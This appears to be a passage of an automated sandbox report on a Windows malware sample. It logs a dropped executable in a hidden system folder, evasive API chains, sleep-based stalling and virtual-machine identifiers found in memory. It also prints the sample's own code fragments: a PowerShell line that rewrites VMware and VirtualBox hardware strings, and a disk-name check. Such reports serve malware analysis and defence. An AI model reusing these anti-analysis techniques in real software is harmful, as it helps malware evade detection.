Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1558Jump to behavior
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 397
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1462
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1428
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1792
Source: C:\Windows\System32\spoolsv.exeWindow / User API: threadDelayed 1252
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\$nya-onimai2\qVrKPA.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_7-612
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_13-16436
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_7-615
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-573
Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 9.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.3 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep count: 5703 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep count: 4152 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 6616Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876Thread sleep count: 2078 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876Thread sleep time: -2078000s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 320Thread sleep count: 650 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 320Thread sleep time: -65000s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876Thread sleep count: 6767 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 2876Thread sleep time: -6767000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064Thread sleep count: 7593 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064Thread sleep time: -7593000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7060Thread sleep count: 492 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7060Thread sleep time: -49200s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064Thread sleep count: 1216 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7064Thread sleep time: -1216000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2284Thread sleep count: 51 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2284Thread sleep time: -51000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2300Thread sleep count: 1640 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2300Thread sleep time: -164000s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exe TID: 8372Thread sleep time: -114300s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4068Thread sleep count: 8794 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4068Thread sleep time: -8794000s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 1400Thread sleep count: 410 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 1400Thread sleep time: -41000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1876Thread sleep count: 36 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1876Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 528Thread sleep count: 1553 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 528Thread sleep time: -155300s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6392Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1480Thread sleep count: 1224 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1480Thread sleep time: -122400s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6580Thread sleep count: 1695 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6580Thread sleep time: -169500s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4744Thread sleep count: 151 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4744Thread sleep time: -151000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1628Thread sleep count: 1651 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1628Thread sleep time: -165100s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4072Thread sleep count: 153 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4072Thread sleep time: -153000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1888Thread sleep count: 1691 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1888Thread sleep time: -169100s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6524Thread sleep count: 1595 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6524Thread sleep time: -159500s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4164Thread sleep count: 1486 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4164Thread sleep time: -148600s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6696Thread sleep count: 1761 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6696Thread sleep time: -176100s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6164Thread sleep count: 1770 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6164Thread sleep time: -177000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5844Thread sleep count: 1771 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5844Thread sleep time: -177100s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3128Thread sleep count: 467 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3128Thread sleep time: -46700s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep count: 180 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1272Thread sleep count: 442 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1272Thread sleep time: -44200s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1992Thread sleep count: 182 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1992Thread sleep time: -182000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep count: 446 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1848Thread sleep time: -44600s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep count: 440 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6184Thread sleep time: -44000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1524Thread sleep count: 1580 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1524Thread sleep time: -158000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6208Thread sleep count: 1580 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6208Thread sleep time: -158000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5972Thread sleep count: 1540 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5972Thread sleep time: -154000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep count: 1624 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep time: -162400s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2292Thread sleep count: 190 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2292Thread sleep time: -190000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340Thread sleep count: 1588 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340Thread sleep time: -158800s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4404Thread sleep count: 67 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4404Thread sleep time: -67000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6968Thread sleep count: 1337 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6968Thread sleep time: -133700s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5792Thread sleep count: 1558 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5792Thread sleep time: -155800s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2520Thread sleep count: 397 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2520Thread sleep time: -39700s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7108Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep count: 1462 > 30
Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -146200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6616Thread sleep count: 1428 > 30
Source: C:\Windows\System32\svchost.exe TID: 6616Thread sleep time: -142800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1968Thread sleep count: 1792 > 30
Source: C:\Windows\System32\svchost.exe TID: 1968Thread sleep time: -179200s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 4256Thread sleep count: 1252 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 4256Thread sleep time: -125200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep count: 96 > 30
Source: C:\Windows\System32\svchost.exe TID: 8996Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3496Thread sleep count: 1229 > 30
Source: C:\Windows\System32\svchost.exe TID: 3496Thread sleep time: -122900s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E85898DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898D894 FindFirstFileExW,8_2_000001E85898D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E8589BDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589BD894 FindFirstFileExW,8_2_000001E8589BD894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001E8589EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589ED894 FindFirstFileExW,8_2_000001E8589ED894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86D894 FindFirstFileExW,9_2_00000140AE86D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00000140AE86DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CD894 FindFirstFileExW,12_2_00000195DD5CD894
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DD5CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00000195DD5CDA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00000195DE1ADA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000195DE1AD894 FindFirstFileExW,12_2_00000195DE1AD894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913ED894 FindFirstFileExW,13_2_00000192913ED894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_00000192913EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00000192913EDA18
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162D894 FindFirstFileExW,13_2_000001929162D894
Source: C:\Windows\System32\cmd.exeCode function: 13_2_000001929162DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_000001929162DA18
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000139F96DDA18
Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000139F96DD894 FindFirstFileExW,14_2_00000139F96DD894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3D894 FindFirstFileExW,15_2_000001160CB3D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CB3DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9D894 FindFirstFileExW,15_2_000001160CB9D894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CB9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CB9DA18
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCD894 FindFirstFileExW,15_2_000001160CBCD894
Source: C:\Windows\System32\dwm.exeCode function: 15_2_000001160CBCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001160CBCDA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10AD894 FindFirstFileExW,19_2_00000257E10AD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00000257E10ADA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DD894 FindFirstFileExW,19_2_00000257E10DD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000257E10DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_00000257E10DDA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001428DD0DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD0D894 FindFirstFileExW,20_2_000001428DD0D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001428DD3DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000001428DD3D894 FindFirstFileExW,20_2_000001428DD3D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93D894 FindFirstFileExW,21_2_000001F28C93D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C93DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F28C93DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96D894 FindFirstFileExW,21_2_000001F28C96D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001F28C96DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F28C96DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854D894 FindFirstFileExW,22_2_000001CA9854D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001CA9854DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001CA9854DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531D894 FindFirstFileExW,23_2_000001D26531D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26531DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001D26531DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534D894 FindFirstFileExW,23_2_000001D26534D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001D26534DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001D26534DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000254A2D4DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000254A2D4D894 FindFirstFileExW,24_2_00000254A2D4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDD894 FindFirstFileExW,25_2_0000024B87DDD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B87DDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000024B87DDDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000024B8848DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000024B8848D894 FindFirstFileExW,25_2_0000024B8848D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00000205FD40DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00000205FD40D894 FindFirstFileExW,26_2_00000205FD40D894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_000001A2056ADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001A2056AD894 FindFirstFileExW,29_2_000001A2056AD894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6D894 FindFirstFileExW,30_2_0000018EC1F6D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000018EC1F6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_0000018EC1F6DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_0000025CE3E0DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE3E0D894 FindFirstFileExW,31_2_0000025CE3E0D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417D894 FindFirstFileExW,31_2_0000025CE417D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025CE417DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_0000025CE417DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 0000001A.00000002.3535924993.00000205FABB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001A.00000000.2246600077.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3539564931.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 0000001A.00000002.3540590309.00000205FAC43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: svchost.exe, 00000018.00000000.2228995161.00000254A202B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000014.00000002.3607685052.000001428B138000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: dwm.exe, 0000000F.00000002.3611901630.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
Source: svchost.exe, 0000002F.00000002.3534964991.000001C781F02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000003.2262721455.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000001A.00000002.3591738385.00000205FBAB7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 0000002F.00000002.3527580382.000001C781E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000001A.00000002.3535924993.00000205FABB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001A.00000003.2252800824.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: cmd.exe, 0000000D.00000003.2167756120.000001929145C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 0000001A.00000002.3587233517.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2246438484.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2ue).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
